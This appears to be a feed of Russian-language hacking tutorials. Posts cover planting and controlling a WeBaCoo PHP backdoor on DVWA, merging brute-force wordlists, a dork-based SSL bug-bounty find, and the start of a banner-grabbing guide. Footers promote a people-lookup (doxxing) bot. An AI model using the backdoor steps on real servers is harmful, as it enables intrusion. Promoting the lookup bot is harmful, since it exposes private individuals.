  &lt;p id=&quot;foLZ&quot;&gt;1sudo apt install webacoo&lt;/p&gt;
  &lt;p id=&quot;ctiv&quot;&gt;&lt;strong&gt;Использование WeBaCoo для создания скрытого соединения&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;CI6g&quot;&gt;Сначала по традиции заглянем в справку WeBaCoo:&lt;/p&gt;
  &lt;p id=&quot;lEG2&quot;&gt;1webacoo -h&lt;/p&gt;
  &lt;p id=&quot;pXse&quot;&gt;Теперь используя WeBaCoo, создадим бэкдор PHP:&lt;/p&gt;
  &lt;p id=&quot;Zmkv&quot;&gt;1webacoo -g -o /home/kali/testbackdoor.php&lt;/p&gt;
  &lt;p id=&quot;yTCz&quot;&gt;В приведенной выше команде, мы используем параметр-g для создания бэкдора и параметр-o для выбора местоположения созданного файла (в моем случае — домашний каталог):&lt;/p&gt;
  &lt;p id=&quot;2Db6&quot;&gt;1home/kali&lt;/p&gt;
  &lt;p id=&quot;wmkM&quot;&gt;После выполнения команды будет создан бэкдор PHP.&lt;/p&gt;
  &lt;p id=&quot;hQsa&quot;&gt;Теперь пришло время загрузить его на уязвимый сервер или сайт. Здесь мы предполагаем, что сервер не имеет никаких ограничений, которые могут запрещать определенные расширение или типы загружаемого файла.&lt;/p&gt;
  &lt;p id=&quot;LIoz&quot;&gt;Для этого примера, загрузим его на специально уязвимое веб-приложение DVWA, созданное для таких, как мы (этичных хакеров).&lt;/p&gt;
  &lt;p id=&quot;RvY8&quot;&gt;После успешной загрузки, будет отображен путь к загруженному файлу (см. скрин выше). Этот путь является фактическим местоположением загруженного файла. Он нужен нам для доступа к полезной нагрузке.&lt;/p&gt;
  &lt;p id=&quot;TaMH&quot;&gt;Теперь можем получить доступ к бэкдору PHP с помощью WeBaCoo. Для этого в терминале выполняем команду:&lt;/p&gt;
  &lt;p id=&quot;EjHZ&quot;&gt;1webacoo -t -u http://127.8.0.1/hackable/uploads/testbackdoor.php&lt;/p&gt;
  &lt;p id=&quot;wNAX&quot;&gt;После применения вышеуказанной команды, вы увидите сообщение о подключение бэкдора. Чтобы проверить работу бэкдора, запустим несколько команд.&lt;/p&gt;
  &lt;p id=&quot;rvdv&quot;&gt;С помощью префикса: можно управлять бекдором, выполняя различные команды. Со всеми &lt;a href=&quot;https://github.com/anestisb/WeBaCoo&quot; target=&quot;_blank&quot;&gt;остальными фишками&lt;/a&gt;, разберетесь сами.&lt;/p&gt;
  &lt;p id=&quot;eK4w&quot;&gt;Вот как можно создать бэкдор PHP с помощью WeBaCo и использовать его для удаленного подключения.&lt;/p&gt;
  &lt;p id=&quot;HuXK&quot;&gt;Как видите WeBaCoo очень прост в использовании, но используйте тулзу с умом, не нарушая закон!&lt;/p&gt;
  &lt;p id=&quot;PMpk&quot;&gt;&lt;strong&gt;РЕКОМЕНДУЕМ:&lt;/strong&gt;&lt;/p&gt;
  &lt;ul id=&quot;YEoD&quot;&gt;
    &lt;li id=&quot;YqyB&quot;&gt;&lt;a href=&quot;https://spy-soft.net/hacking-web-server-php/&quot; target=&quot;_blank&quot;&gt;Взлом веб-сервера на PHP&lt;/a&gt;&lt;/li&gt;
    &lt;li id=&quot;CYOY&quot;&gt;&lt;a href=&quot;https://spy-soft.net/hackthebox-knife/&quot; target=&quot;_blank&quot;&gt;Эксплуатация бэкдора PHP на виртуалке Knife HackTheBox&lt;/a&gt;&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;Nadd&quot;&gt;&lt;a href=&quot;https://spy-soft.net/webacoo/&quot; target=&quot;_blank&quot;&gt;Источник&lt;/a&gt;&lt;/p&gt;
  &lt;figure id=&quot;P56X&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/f3/21/f321894a-18ef-4f4c-8ec5-c93d98dc8d69.png&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;HUvG&quot;&gt;&lt;strong&gt;Наши проекты:&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;JuK2&quot;&gt;- Кибер новости: &lt;a href=&quot;https://t.me/matrixleaked&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;the Matrix&lt;/strong&gt;&lt;/a&gt;&lt;br /&gt;- Хакинг: &lt;a href=&quot;https://t.me/+bby6PJAbqpNhOWZh&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;/me Hacker&lt;/strong&gt;&lt;/a&gt;&lt;br /&gt;- Кодинг: &lt;a href=&quot;https://t.me/+zBgEm0olmpxlMzA6&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;Minor Code&lt;/strong&gt;&lt;/a&gt;&lt;br /&gt;👁 Пробить человека? Легко через нашего бота: &lt;a href=&quot;https://t.me/iprobivator_bot&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;Мистер Пробиватор&lt;/strong&gt;&lt;/a&gt;&lt;/p&gt;

</content></entry><entry><id>matrix_supp:Rabota-s-bolshimi-slovaryami-dlya-bruta-na-Kali-Linux-09-28</id><link rel="alternate" type="text/html" href="https://teletype.in/@matrix_supp/Rabota-s-bolshimi-slovaryami-dlya-bruta-na-Kali-Linux-09-28?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=matrix_supp"></link><title>Работа с большими словарями для брута на Kali Linux</title><published>2022-09-28T07:35:21.985Z</published><updated>2022-09-28T07:35:21.985Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img4.teletype.in/files/76/57/76574b46-8f72-405d-aaa6-f3b0fa867044.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://img3.teletype.in/files/2a/a1/2aa1e038-5e9b-4204-a3e4-98f9ebeb72e4.png&quot;&gt;В пентестах и в форензике часто используют атаку Брутфорс (брут). Но успешный брут зависит не только от длины посоха пароля, но и от хорошего словаря. Чтобы подобрать пароль, может потребоваться большой список паролей и логинов. Работа с хорошими большими словарями для брута может быть довольно затруднительна. В этой статье я познакомлю вас, с инструментами Kali Linux, которые облегчат эту задачу.</summary><content type="html">
  &lt;figure id=&quot;pIlD&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/2a/a1/2aa1e038-5e9b-4204-a3e4-98f9ebeb72e4.png&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;tYeU&quot;&gt;В пентестах и в форензике часто используют атаку Брутфорс (брут). Но успешный брут зависит не только от длины посоха пароля, но и от хорошего словаря. Чтобы подобрать пароль, может потребоваться большой список паролей и логинов. Работа с хорошими &lt;a href=&quot;https://spy-soft.net/bolshoj-slovar-dlya-bruta/&quot; target=&quot;_blank&quot;&gt;большими словарями для брута&lt;/a&gt; может быть довольно затруднительна. В этой статье я познакомлю вас, с инструментами Kali Linux, которые облегчат эту задачу.&lt;/p&gt;
  &lt;p id=&quot;xWzo&quot;&gt;Еще по теме: &lt;a href=&quot;https://spy-soft.net/ogromnyj-slovar-dlya-bruta-anglijskie-slova/&quot; target=&quot;_blank&quot;&gt;Огромный словарь для брута (Английские слова)&lt;/a&gt;&lt;/p&gt;
  &lt;p id=&quot;oySj&quot;&gt;&lt;strong&gt;Работа с большими словарями для брута на Kali Linux&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;5mGl&quot;&gt;Манипуляции с большими текстовыми файлами — это всегда неприятные ощущения и геморрой. Если вы когда-нибудь пытались отредактировать текстовый файл размером 10 ГБ на ноутбуке среднего класса, то понимаете о чем я говорю.&lt;/p&gt;
  &lt;p id=&quot;hi74&quot;&gt;В этой ситуации можно использовать два инструмента — Dymerge и просто команды оболочки Bash.&lt;/p&gt;
  &lt;h3 id=&quot;Работа-с-большими-словарями-для-брута-с-помощью-Dymerge&quot;&gt;Работа с большими словарями для брута с помощью Dymerge&lt;/h3&gt;
  &lt;p id=&quot;nq2C&quot;&gt;&lt;a href=&quot;https://github.com/k4m4/dymerge&quot; target=&quot;_blank&quot;&gt;Dymerge&lt;/a&gt; — это скрипт Python для работы словарями для брута. Это простой консольный инструмент, который может объединять словари для брута или добавлять / удалять определенные слова из списка слов.&lt;/p&gt;
  &lt;p id=&quot;pY51&quot;&gt;Для установки Dymerge на Kali Linux:&lt;/p&gt;
  &lt;p id=&quot;pZ9J&quot;&gt;1git clone https://github.com/k4m4/dymerge&lt;/p&gt;
  &lt;figure id=&quot;PsUJ&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/63/7b/637b79d1-e9b0-40e8-bf43-86390da83c7f.png&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;4DAe&quot;&gt;Преходим в каталог dymerge:&lt;/p&gt;
  &lt;p id=&quot;yZrR&quot;&gt;1cd dymerge&lt;/p&gt;
  &lt;p id=&quot;ctFk&quot;&gt;С помощью команду ls отобразим содержимое:&lt;/p&gt;
  &lt;p id=&quot;Q8pB&quot;&gt;1ls&lt;/p&gt;
  &lt;p id=&quot;OJ6z&quot;&gt;Среди файлов находим скрипт Python &lt;strong&gt;dymerge.py&lt;/strong&gt;.&lt;/p&gt;
  &lt;p id=&quot;yNgT&quot;&gt;По традиции открываем справку:&lt;/p&gt;
  &lt;p id=&quot;Y7Fs&quot;&gt;1python dymerge.py --help&lt;/p&gt;
  &lt;p id=&quot;2KlZ&quot;&gt;Видим параметры и возможности.&lt;/p&gt;
  &lt;p id=&quot;zauZ&quot;&gt;Итак, на рабочий стол я закинул словари для брута.&lt;/p&gt;
  &lt;p id=&quot;l82T&quot;&gt;Попробуем объединить все текстовые файлы в один большой словарь, а на выходе заархивируем его, чтобы он не занимал много места.&lt;/p&gt;
  &lt;p id=&quot;4jzA&quot;&gt;Параметр -o используем для выбора местоположения конечного файла и формата.&lt;/p&gt;
  &lt;p id=&quot;TDNF&quot;&gt;Можно также добавить отдельные слова в конечный файл, (добавим, на пример, слово KaliLinuxIn), для этого используем директиву -i.&lt;/p&gt;
  &lt;p id=&quot;6tuH&quot;&gt;Параметр-u позволяет удалить повторяющиеся пароли.&lt;/p&gt;
  &lt;p id=&quot;g6PD&quot;&gt;Со всеми нашими хотелками, команда будет выглядеть так:&lt;/p&gt;
  &lt;p id=&quot;rnwP&quot;&gt;1python dymerge.py /home/kali/Desktop/my-wordlists -u -f -o /home/kali/Desktop/my-wordlistsgiantwordlist.txt -i KaliLinuxIn -z bz2&lt;/p&gt;
  &lt;p id=&quot;rjIr&quot;&gt;После выполнения видим следующее:&lt;/p&gt;
  &lt;p id=&quot;qVsd&quot;&gt;Дождитесь окончания процесса. Скорость работы зависит от размера и мощности компьютера.&lt;/p&gt;
  &lt;p id=&quot;1Zi5&quot;&gt;После завершения, в каталоге появился архив «giant-wordlist.txt.bz2.&lt;/p&gt;
  &lt;p id=&quot;S1UX&quot;&gt;Так работает Dymerge. В целом это хороший инструмент, но он плохо работает с огромными файлами. Это связано с тем, что он загружает каждое слово из каждого словаря в массив, что может вызвать зависания.&lt;/p&gt;
  &lt;p id=&quot;PLzY&quot;&gt;Его можно заменить командами оболочки Bash.&lt;/p&gt;
  &lt;h3 id=&quot;Командами-оболочки-Bash-—-хорошая-альтернатива-DyMerge&quot;&gt;Командами оболочки Bash — хорошая альтернатива DyMerge&lt;/h3&gt;
  &lt;p id=&quot;HiqE&quot;&gt;Вот некоторые варианты использования Dymerge и аналог команды оболочки Bash.&lt;/p&gt;
  &lt;p id=&quot;c0Mz&quot;&gt;Команда Dymerge:&lt;/p&gt;
  &lt;p id=&quot;a3ER&quot;&gt;1python dymerge.py /usr/share/wordlists/rockyou.txt /lists/cewl.txt -s -u&lt;/p&gt;
  &lt;p id=&quot;IKOY&quot;&gt;Аналог Bash:&lt;/p&gt;
  &lt;p id=&quot;PgHA&quot;&gt;1sort -u /usr/share/wordlists/rockyou.txt /lists/cewl.txt &amp;gt; output.txt&lt;/p&gt;
  &lt;p id=&quot;S49o&quot;&gt;Команда Dymerge:&lt;/p&gt;
  &lt;p id=&quot;3II0&quot;&gt;1python dymerge.py /lists/cewl.txt /lists/awlg.txt -s -u -i Passw0rd,inpuT&lt;/p&gt;
  &lt;p id=&quot;ima2&quot;&gt;Аналог Bash:&lt;/p&gt;
  &lt;p id=&quot;rGR6&quot;&gt;1sort -u /lists/cewl.txt /lists/awlg.txt &amp;lt;(echo &amp;#x27;Passw0rd\ninpuT&amp;#x27;) &amp;gt; output.txt&lt;/p&gt;
  &lt;p id=&quot;bqmO&quot;&gt;Команда Dymerge:&lt;/p&gt;
  &lt;p id=&quot;n2Aq&quot;&gt;1python dymerge.py ~/fsocity.dic -s -u -r -o ~/clean.txt&lt;/p&gt;
  &lt;p id=&quot;Ju1L&quot;&gt;Аналог Bash:&lt;/p&gt;
  &lt;p id=&quot;USgf&quot;&gt;1sort -r &amp;lt;~/fsocity.dic | uniq&amp;gt; clean.txt&lt;/p&gt;
  &lt;p id=&quot;G1ry&quot;&gt;Команда Dymerge:&lt;/p&gt;
  &lt;p id=&quot;ikal&quot;&gt;1python dymerge.py /dicts/crunch.txt /dicts/john.txt -s -u -f -z bz2&lt;/p&gt;
  &lt;p id=&quot;hi7C&quot;&gt;Аналог Bash:&lt;/p&gt;
  &lt;p id=&quot;N4Tn&quot;&gt;1sort -u /dicts/crunch.txt /dicts/john.txt | bzip2 &amp;gt; output.bz2&lt;/p&gt;
  &lt;p id=&quot;IlS7&quot;&gt;С помощью рассмотренных инструментов, вы сможете добавлять, удалять слова (и не только) и обеднять большие словари для брута. Какой инструмент использовать, выбирать только вам.&lt;/p&gt;
  &lt;p id=&quot;btRS&quot;&gt;На сегодня все. Встретимся в следующей статье!&lt;/p&gt;
  &lt;p id=&quot;6KCq&quot;&gt;&lt;strong&gt;РЕКОМЕНДУЕМ:&lt;/strong&gt;&lt;/p&gt;
  &lt;ul id=&quot;3O5C&quot;&gt;
    &lt;li id=&quot;lkEx&quot;&gt;&lt;a href=&quot;https://spy-soft.net/kak-sozdat-slovar-dlya-bruta-v-kali-linux/&quot; target=&quot;_blank&quot;&gt;Создание словарей для брута на Kali Linux&lt;/a&gt;&lt;/li&gt;
    &lt;li id=&quot;6esw&quot;&gt;&lt;a href=&quot;https://spy-soft.net/rockyou-txt/&quot; target=&quot;_blank&quot;&gt;Где находится в Kali Linux популярный словарь Rockyou.txt?&lt;/a&gt;&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;U8c1&quot;&gt;&lt;a href=&quot;https://spy-soft.net/manage-big-passwordlists/&quot; target=&quot;_blank&quot;&gt;Источник&lt;/a&gt;&lt;/p&gt;
  &lt;figure id=&quot;BWsA&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/f3/21/f321894a-18ef-4f4c-8ec5-c93d98dc8d69.png&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;Ju9D&quot;&gt;&lt;strong&gt;Наши проекты:&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;V6QW&quot;&gt;- Кибер новости: &lt;a href=&quot;https://t.me/matrixleaks&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;the Matrix&lt;/strong&gt;&lt;/a&gt;&lt;br /&gt;- Хакинг: &lt;a href=&quot;https://t.me/+bby6PJAbqpNhOWZh&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;/me Hacker&lt;/strong&gt;&lt;/a&gt;&lt;br /&gt;- Кодинг: &lt;a href=&quot;https://t.me/+zBgEm0olmpxlMzA6&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;Minor Code&lt;/strong&gt;&lt;/a&gt;&lt;br /&gt;👁 Пробить человека? Легко через нашего бота: &lt;a href=&quot;https://t.me/iprobivator_bot&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;Мистер Пробиватор&lt;/strong&gt;&lt;/a&gt;&lt;/p&gt;

</content></entry><entry><id>matrix_supp:Nashel-uyazvimosti-na-sajte-Nokia-s-pomoshchyu-Google-Dorks-09-26</id><link rel="alternate" type="text/html" href="https://teletype.in/@matrix_supp/Nashel-uyazvimosti-na-sajte-Nokia-s-pomoshchyu-Google-Dorks-09-26?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=matrix_supp"></link><title>Нашел уязвимости на сайте Nokia с помощью Google Dorks</title><published>2022-09-26T11:23:30.827Z</published><updated>2022-09-26T11:23:30.827Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img2.teletype.in/files/96/f5/96f5e158-9df1-40c5-9ea2-e177b0f7aaff.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://img2.teletype.in/files/d9/c6/d9c61f93-9eb4-4dd6-a39a-7ccab005993b.png&quot;&gt;Здравствуйте, господа багхантеры! Меня зовут Джениш Паншал и в этой короткой статье я расскажу об уязвимости, связанной с неправильной конфигурацией SSL, и о том, как мне удалось, с помощью простого Гугл Дорка, найти эту уязвимость на сайтах Nokia и Кембриджского университета.</summary><content type="html">
  &lt;figure id=&quot;SPuI&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/d9/c6/d9c61f93-9eb4-4dd6-a39a-7ccab005993b.png&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;sPNN&quot;&gt;Здравствуйте, господа багхантеры! Меня зовут Джениш Паншал и в этой короткой статье я расскажу об уязвимости, связанной с неправильной конфигурацией SSL, и о том, как мне удалось, с помощью простого Гугл Дорка, найти эту уязвимость на сайтах Nokia и Кембриджского университета.&lt;/p&gt;
  &lt;p id=&quot;StMi&quot;&gt;Еще по теме: &lt;a href=&quot;https://spy-soft.net/postgresql-vulnerabilities/&quot; target=&quot;_blank&quot;&gt;Интересные уязвимости PostgreSQL&lt;/a&gt;&lt;/p&gt;
  &lt;p id=&quot;8psZ&quot;&gt;&lt;strong&gt;Уязвимости на сайте Nokia и Кембриджского университета&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;Ki5J&quot;&gt;Неправильная конфигурация SSL (SSL Misconfiguration) позволяет инициировать атаку «человек посередине», притворяясь веб-сервером, пока клиент не согласится использовать для подключения шифрование SSL 3.0. Затем злоумышленник получает нужную информацию с помощью автоматизированных инструментов, которые изменяют блоки заполнения и ждут ответа сервера. Подробнее рассказывалось в статье «&lt;a href=&quot;https://spy-soft.net/ssl-tls-vulnerabilities/&quot; target=&quot;_blank&quot;&gt;Уязвимости SSL и TLS-протокола&lt;/a&gt;»&lt;/p&gt;
  &lt;p id=&quot;ABpK&quot;&gt;Bug Bounty — это программа, которую владелец сайта (web-приложения) проводит для привлечения сторонних специалистов в области ИБ к поиску уязвимостей. При участии в программе Bug Bounty нужно действовать этично и придерживаться установленных правил. Не забывайте, что несанкционированный взлом является незаконным и расценивается, как уголовное преступление. Ни редак­ция spy-soft.net, ни автор не несут ответс­твен­ность за ваши действия.&lt;/p&gt;
  &lt;p id=&quot;ticy&quot;&gt;Google Dork Queries — это набор поисковых запросов для выявления грубейших дыр в безопасности. Всего, что должным образом не спрятано от поисковых роботов.&lt;/p&gt;
  &lt;p id=&quot;7mDL&quot;&gt;Для краткости такие запросы называют Гугл Дорки или просто дорками, как и тех админов, чьи ресурсы удалось взломать с помощью GDQ. Подробнее о Гугл Дорках и примерах использования, в статье «&lt;a href=&quot;https://spy-soft.net/gugl-dorki/&quot; target=&quot;_blank&quot;&gt;Что такое Google Dorks&lt;/a&gt;».&lt;/p&gt;
  &lt;p id=&quot;wlLH&quot;&gt;Для поиска уязвимых ресурсов был использован следующий дорк:&lt;/p&gt;
  &lt;p id=&quot;CAM2&quot;&gt;1site:*.target.com inurl:http register signup&lt;/p&gt;
  &lt;p id=&quot;fw01&quot;&gt;Дорк позволяет найти поддомены (в данном случае поддомены Nokia и Кембриджского университета), которые работают на протоколе HTTP и позволяют пользователю зарегистрировать учетную запись в своем веб-приложении.&lt;/p&gt;
  &lt;p id=&quot;08Uw&quot;&gt;После того как наметились потенциальные цели. Я сделал следующее:&lt;/p&gt;
  &lt;p id=&quot;BLsi&quot;&gt;&amp;gt;Во-первых, зарегистрировался по всем найденным адресам.&lt;/p&gt;
  &lt;p id=&quot;WiNI&quot;&gt;После регистрации, не входя созданную учетную запись, запросил сброс пароля нажав на «Забыл пароль».&lt;/p&gt;
  &lt;p id=&quot;D4mw&quot;&gt;Проверил, работает ли ссылка для сброса пароля на HTTPS или на HTTP.&lt;/p&gt;
  &lt;p id=&quot;BimJ&quot;&gt;Ссылка для сброса пароля работала на HTTP, что указывает на уязвимость SSL.&lt;/p&gt;
  &lt;p id=&quot;7dv3&quot;&gt;Письмо об уязвимости SSL было отправлено в Nokia 16 августа утром. В тот же день ночью я получил ответ.&lt;/p&gt;
  &lt;p id=&quot;rGKJ&quot;&gt;Найти мой репорт и ссылку на профиль может &lt;a href=&quot;https://www.nokia.com/notices/responsible-disclosure/&quot; target=&quot;_blank&quot;&gt;здесь&lt;/a&gt;, в разделе за август 2022 год.&lt;/p&gt;
  &lt;p id=&quot;ChXI&quot;&gt;Письмо об уязвимости SSL в Кембриджский университет и ответ на него.&lt;/p&gt;
  &lt;p id=&quot;Q4fQ&quot;&gt;Вот, как простая уязвимость и умение использовать Гугл Дорки, может сделать вас успешным багхантером.&lt;/p&gt;
  &lt;p id=&quot;5GH6&quot;&gt;&lt;strong&gt;РЕКОМЕНДУЮ:&lt;/strong&gt;&lt;/p&gt;
  &lt;ul id=&quot;98B6&quot;&gt;
    &lt;li id=&quot;k2ri&quot;&gt;&lt;a href=&quot;https://spy-soft.net/tools-to-find-vulnerabilities/&quot; target=&quot;_blank&quot;&gt;Инструменты для поиска уязвимостей сайтов&lt;/a&gt;&lt;/li&gt;
    &lt;li id=&quot;hptE&quot;&gt;&lt;a href=&quot;https://spy-soft.net/hack-dutch-government-site/&quot; target=&quot;_blank&quot;&gt;Вот как я взломал правительственный сайт Нидерландов&lt;/a&gt;&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;9HXd&quot;&gt;&lt;a href=&quot;https://spy-soft.net/ssl-vulnerability-google-dorks/&quot; target=&quot;_blank&quot;&gt;Источник&lt;/a&gt;&lt;/p&gt;
  &lt;figure id=&quot;yqTw&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/f3/21/f321894a-18ef-4f4c-8ec5-c93d98dc8d69.png&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;5buC&quot;&gt;&lt;strong&gt;Наши проекты:&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;onv4&quot;&gt;- Кибер новости: &lt;a href=&quot;https://t.me/matrixleaks&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;the Matrix&lt;/strong&gt;&lt;/a&gt;&lt;br /&gt;- Хакинг: &lt;a href=&quot;https://t.me/+bby6PJAbqpNhOWZh&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;/me Hacker&lt;/strong&gt;&lt;/a&gt;&lt;br /&gt;- Кодинг: &lt;a href=&quot;https://t.me/+zBgEm0olmpxlMzA6&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;Minor Code&lt;/strong&gt;&lt;/a&gt;&lt;br /&gt;👁 Пробить человека? Легко через нашего бота: &lt;a href=&quot;https://t.me/iprobivator_bot&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;Мистер Пробиватор&lt;/strong&gt;&lt;/a&gt;&lt;/p&gt;

</content></entry><entry><id>matrix_supp:Sbor-bannerov-na-Kali-Linux-09-25</id><link rel="alternate" type="text/html" href="https://teletype.in/@matrix_supp/Sbor-bannerov-na-Kali-Linux-09-25?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=matrix_supp"></link><title>Сбор баннеров на Kali Linux</title><published>2022-09-25T10:41:55.940Z</published><updated>2022-09-25T10:41:55.940Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img4.teletype.in/files/70/ff/70ffe57a-c25d-4faa-ae20-6a91d89baa9e.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://img3.teletype.in/files/2b/ca/2bca6f03-aaf2-4279-aafc-524863c8893f.png&quot;&gt;Сбор баннеров или как говорят наши иностранные коллеги Banner Gabbing — это получение информации об открытых портах и ​работающих ​службах хоста. Эта техника используются хакерами и пентестерами для анализа системы. В сегодняшней статье я познакомлю вас с лучшими инструментами для сбора баннеров на Kali Linux.</summary><content type="html">
  &lt;figure id=&quot;JXdG&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/2b/ca/2bca6f03-aaf2-4279-aafc-524863c8893f.png&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;auCQ&quot;&gt;Сбор баннеров или как говорят наши иностранные коллеги Banner Gabbing — это получение информации об открытых портах и ​работающих ​службах хоста. Эта техника используются хакерами и пентестерами для анализа системы. В сегодняшней статье я познакомлю вас с лучшими инструментами для сбора баннеров на Kali Linux.&lt;/p&gt;
  &lt;p id=&quot;1e6y&quot;&gt;Еще по теме: &lt;a href=&quot;https://spy-soft.net/http-server-ssl-kali-linux/&quot; target=&quot;_blank&quot;&gt;HTTP-сервер с шифрованием TLS на Kali Linux&lt;/a&gt;&lt;/p&gt;
  &lt;p id=&quot;t36W&quot;&gt;&lt;strong&gt;Сбор баннеров на Kali Linux&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;tlWT&quot;&gt;Далее рассмотрим инструменты, которые предустановлены в Kali Linux. Если вы работаете на другом дистрибутиве Linux, вы можете установить их самостоятельно с помощью:&lt;/p&gt;
  &lt;p id=&quot;NIN7&quot;&gt;1apt-get install&lt;/p&gt;
  &lt;p id=&quot;Ibay&quot;&gt;Речь пойдет об инструментах:&lt;/p&gt;
  &lt;ul id=&quot;lBuX&quot;&gt;
    &lt;li id=&quot;MQOr&quot;&gt;&lt;strong&gt;Whatweb &lt;/strong&gt;&lt;/li&gt;
    &lt;li id=&quot;H5Yu&quot;&gt;&lt;strong&gt;Curl &lt;/strong&gt;&lt;/li&gt;
    &lt;li id=&quot;nqbF&quot;&gt;&lt;strong&gt;Wget &lt;/strong&gt;&lt;/li&gt;
    &lt;li id=&quot;9Twv&quot;&gt;&lt;strong&gt;netcat &lt;/strong&gt;&lt;/li&gt;
    &lt;li id=&quot;rdq2&quot;&gt;&lt;strong&gt;telnet &lt;/strong&gt;&lt;/li&gt;
    &lt;li id=&quot;ViHm&quot;&gt;&lt;strong&gt;nikto &lt;/strong&gt;&lt;/li&gt;
    &lt;li id=&quot;LtIr&quot;&gt;&lt;strong&gt;Nmap&lt;/strong&gt;&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;9Bu6&quot;&gt;Для демонстрации я буду использовать намеренно уязвимый сайт уязвимый сайт testphp.vulnweb от Acunetix, специально разработанный для таких, как мы (этичных хакеров).&lt;/p&gt;
  &lt;p id=&quot;S08z&quot;&gt;Статья написана в образовательных целях, для обучения этичных хакеров. При демонстрации работы были использованы личные устройства автора. Использование подобных инструментов на чужих устройствах без надлежащего письменного разрешения, является незаконным и будет расцениваться, как уголовное преступление. Ни редак­ция spy-soft.net, ни автор не несут ответс­твен­ность за ваши действия.&lt;/p&gt;
  &lt;h3 id=&quot;Whatweb&quot;&gt;Whatweb&lt;/h3&gt;
  &lt;p id=&quot;KT9H&quot;&gt;Откройте консоль Kali Linuix и выполните команду, добавив при этом урл сайта или IP-адрес:&lt;/p&gt;
  &lt;p id=&quot;Ymn2&quot;&gt;1whatweb &amp;lt;урл_сайта/ip_адрес&amp;gt;&lt;/p&gt;
  &lt;p id=&quot;GqBT&quot;&gt;Я использовал сайт Vulnweb. Вместо урла можно указать IP-адрес.&lt;/p&gt;
  &lt;h3 id=&quot;Curl&quot;&gt;Curl&lt;/h3&gt;
  &lt;p id=&quot;OmCh&quot;&gt;В терминале Kali выполните следующую команду:&lt;/p&gt;
  &lt;p id=&quot;yebr&quot;&gt;1curl -I &amp;lt;урл_сайта/ip_адрес&amp;gt;&lt;/p&gt;
  &lt;p id=&quot;WWKX&quot;&gt;В curl директива-I извлекает заголовок.&lt;/p&gt;
  &lt;h3 id=&quot;Wget&quot;&gt;Wget&lt;/h3&gt;
  &lt;p id=&quot;Q7A9&quot;&gt;Большинство из вас могут использовать wget для скачивания файлов в терминале. Но wget также может помочь в сборе баннеров.&lt;/p&gt;
  &lt;p id=&quot;MqTq&quot;&gt;Откройте консоль Kali и добавив адрес сайта или IP-адрес, выполните следующую команду:&lt;/p&gt;
  &lt;p id=&quot;cRR8&quot;&gt;1wget -q -S &amp;lt;урл_сайта/ip_адрес&amp;gt;&lt;/p&gt;
  &lt;p id=&quot;HEIX&quot;&gt;Директива-q позволяет скрыть лишнюю информацию, а-S предназначен для получения ответа сервера.&lt;/p&gt;
  &lt;p id=&quot;OOc5&quot;&gt;Результат с параметром-q:&lt;/p&gt;
  &lt;p id=&quot;bcIr&quot;&gt;Результат без параметра-q:&lt;/p&gt;
  &lt;h3 id=&quot;Netcat&quot;&gt;Netcat&lt;/h3&gt;
  &lt;p id=&quot;Pi85&quot;&gt;&lt;strong&gt;Способ 1&lt;/strong&gt;: Откройте терминал Kali и выполните команду:&lt;/p&gt;
  &lt;p id=&quot;RZ3s&quot;&gt;1nc &amp;lt;имя_хоста/ip_адрес&amp;gt; 80&lt;/p&gt;
  &lt;p id=&quot;Z8ea&quot;&gt;Введите &lt;strong&gt;HTTP/1.1 200&lt;/strong&gt; и нажмите Enter.&lt;/p&gt;
  &lt;ul id=&quot;7s5H&quot;&gt;
    &lt;li id=&quot;nLK0&quot;&gt;&lt;strong&gt;HTTP/1.1&lt;/strong&gt; — версия HTTP.&lt;/li&gt;
    &lt;li id=&quot;y7UN&quot;&gt;&lt;strong&gt;200&lt;/strong&gt; — код состояния HTTP.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;PVeL&quot;&gt;&lt;strong&gt;Способ 2:&lt;/strong&gt; Выполните команду&lt;/p&gt;
